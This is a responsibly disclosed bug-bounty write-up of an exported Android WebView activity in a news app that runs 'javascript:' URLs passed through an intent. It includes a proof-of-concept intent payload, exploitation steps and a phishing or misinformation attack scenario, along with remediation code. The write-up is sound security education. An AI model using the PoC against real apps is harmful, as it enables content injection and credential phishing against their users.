Exploiting WebView Vulnerabilities in Android News Apps

Android Security Published on January 31, 2025

Severity: Low Reward: REDACTED

CVSS Score: 3.9 (Low) CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Android applications often use WebView components to display web content within their interfaces. While this provides a seamless user experience, improper implementation can lead to significant security vulnerabilities. In this writeup, I'll share my discovery of a WebView vulnerability in a popular news application that allowed arbitrary JavaScript execution through an exported activity.

Note on Responsible Disclosure: This vulnerability was responsibly disclosed to the affected organization. All details shared in this post have been approved for publication after the issue was resolved. The target name has been changed to protect the company's identity.

Understanding the Vulnerability Context

WebViews in Android apps are powerful components that display web content using the system's WebView implementation. They can be configured to execute JavaScript, access file systems, and interact with Android app components through JavaScript interfaces. However, this power comes with security risks if not properly implemented.

The vulnerability I discovered in the news application existed due to two critical issues:

An exported WebView activity in the Android manifest
JavaScript execution enabled without proper URL validation

These issues combined allowed a malicious application on the same device to launch the vulnerable activity with a crafted JavaScript URL, executing arbitrary JavaScript code within the context of the news application.

Technical Analysis

Vulnerable Components

After examining the application's manifest file, I discovered that the AdBrowserActivity, which contains a WebView for displaying content, was publicly exported and accessible to other applications:

<activity
    android:name="org.prebid.mobile.rendering.views.browser.AdBrowserActivity"
    android:exported="true"
    android:launchMode="singleTop"
    android:configChanges="screenSize|orientation|keyboardHidden"
    android:windowSoftInputMode="adjustPan|stateHidden"/>

Further analysis of the AdBrowserActivity implementation revealed that JavaScript was enabled in the WebView without proper URL validation:

webView.getSettings().setJavaScriptEnabled(true);
this.f50312a.loadUrl(this.f50318g); // Loads URL without validation

This implementation allows the WebView to load any URL passed via an intent extra, including JavaScript URLs that contain executable code. When combined with the exported activity, this creates a scenario where malicious applications can trigger JavaScript execution in the context of the news app.

The Attack Vector

The attack vector involves a malicious application creating an intent that targets the exported activity and providing a JavaScript URL as an extra. When the activity is launched, it loads the provided URL in the WebView, executing the JavaScript code in the context of the news application.

Intent intent = new Intent();
intent.setComponent(new ComponentName(
    "com.news.app.package",
    "org.prebid.mobile.rendering.views.browser.AdBrowserActivity"
));
intent.putExtra("EXTRA_URL", "javascript:alert('XSS Executed Successfully!')");
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(intent);

This simple code snippet demonstrates how easily an attacker could execute JavaScript in the target application's context.

Proof of Concept Exploitation

To demonstrate this vulnerability, I developed a proof-of-concept application that launches the vulnerable activity with malicious JavaScript payload.

PoC Implementation

Intent intent = new Intent();
intent.setComponent(new ComponentName(
    "com.news.app.package",
    "org.prebid.mobile.rendering.views.browser.AdBrowserActivity"
));
String jsPayload = "javascript:" +
    "document.write('<div style=\"background:black;color:red;padding:20px;font-size:20px;\">');" +
    "document.write('<h1>XSS Attack Successful!</h1>');" +
    "document.write('<p>WebView Security Issues:</p>');" +
    "document.write('<ul>');" +
    "document.write('<li>JavaScript Execution: ' + window.navigator.userAgent + '</li>');" +
    "document.write('<li>WebView Info: ' + navigator.platform + '</li>');" +
    "document.write('</ul></div>');" +
    "alert('XSS Executed Successfully!');";
intent.putExtra("EXTRA_URL", jsPayload);
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(intent);

Exploitation Steps

Install the target news application on a test device
Install the proof-of-concept application on the same device
Launch the PoC application and press the "Launch XSS Attack" button
Observe as the news app launches and the JavaScript payload executes
Confirm successful execution by verifying the displayed information and alert

Impact Analysis

While the vulnerability has a "Low" severity rating according to CVSS (3.9), it still poses several risks to users of the application:

JavaScript code executed in the context of the news app can access WebView information and potentially sensitive data
Attackers could modify content displayed to users, potentially enabling phishing attacks
The vulnerability could be used to display misleading information or fake content to users
In combination with other vulnerabilities, it could potentially lead to more severe exploits

Impact Limitations: The severity is considered low because exploitation requires:

A malicious app to be installed on the user's device
User interaction to launch the attack
Limited access to the WebView's context rather than the broader application context

Real-World Attack Scenario

In a realistic attack scenario, a malicious actor could:

Create a seemingly legitimate app and distribute it through third-party app stores or via phishing
Once installed on the user's device, the malicious app could trigger the vulnerability when the user interacts with it
The WebView in the news app would open with the attacker's JavaScript executing
The JavaScript could display fake login forms to steal credentials or display misleading news content
Users would likely attribute any issues to the legitimate news app rather than the malicious app

The potential for spreading misinformation through a trusted news source makes this vulnerability particularly concerning, despite its technical limitations.

Remediation Strategies

After discovering this vulnerability, I recommended several remediation approaches to the development team:

1. Remove or Restrict Exported Activities

The primary fix is to either remove android:exported="true" from the activity definition or implement proper intent filters to restrict access:

<activity
    android:name="org.prebid.mobile.rendering.views.browser.AdBrowserActivity"
    android:exported="false"
    ... />

2. Implement URL Validation

Add proper URL validation before loading content in the WebView:

// Validate URL before loading
if (url != null && (url.startsWith("http://") || url.startsWith("https://"))) {
    // Whitelist approach - only load from trusted domains
    if (isUrlFromTrustedDomain(url)) {
        webView.loadUrl(url);
    }
} else {
    // Handle invalid URL
    Log.e(TAG, "Attempted to load invalid URL: " + url);
}

3. Implement Content Security Policy

For additional protection, implement a Content Security Policy within the WebView:

webView.loadUrl("javascript: {" +
    "var meta = document.createElement('meta');" +
    "meta.httpEquiv = 'Content-Security-Policy';" +
    "meta.content = 'default-src \\'self\\' https://trusted-domain.com';" +
    "document.head.appendChild(meta);" +
    "}");

4. Disable JavaScript When Not Needed

Consider whether JavaScript is actually needed for the specific WebView implementation, and disable it if possible:

webView.getSettings().setJavaScriptEnabled(false);

Resolution and Reward

After submitting the vulnerability report, the development team acknowledged the issue and implemented several of my recommended fixes in their next application update. The primary changes they made were:

Setting the activity to not exported in the manifest
Adding URL validation to ensure only whitelisted domains could be loaded
Implementing additional logging and security monitoring for WebView usage

For discovering and responsibly reporting this vulnerability, I was awarded a bounty of REDACTED. While modest, the reward acknowledges the potential security implications and the thoroughness of my report.

Conclusion

This case study highlights the importance of properly implementing WebView components in Android applications. Even seemingly minor implementation oversights can lead to vulnerabilities that malicious actors could exploit.

For developers building applications with WebView components, this serves as a reminder to:

Be cautious with exported activities, especially those containing WebViews
Always validate URLs before loading them in WebViews
Disable JavaScript when not needed, or restrict its capabilities
Implement proper security controls like Content Security Policy
Consider the security implications of all app-to-app communication channels

By sharing these findings, I hope to contribute to improving security practices across the mobile app development community and highlight the ongoing importance of security testing for even the most established applications.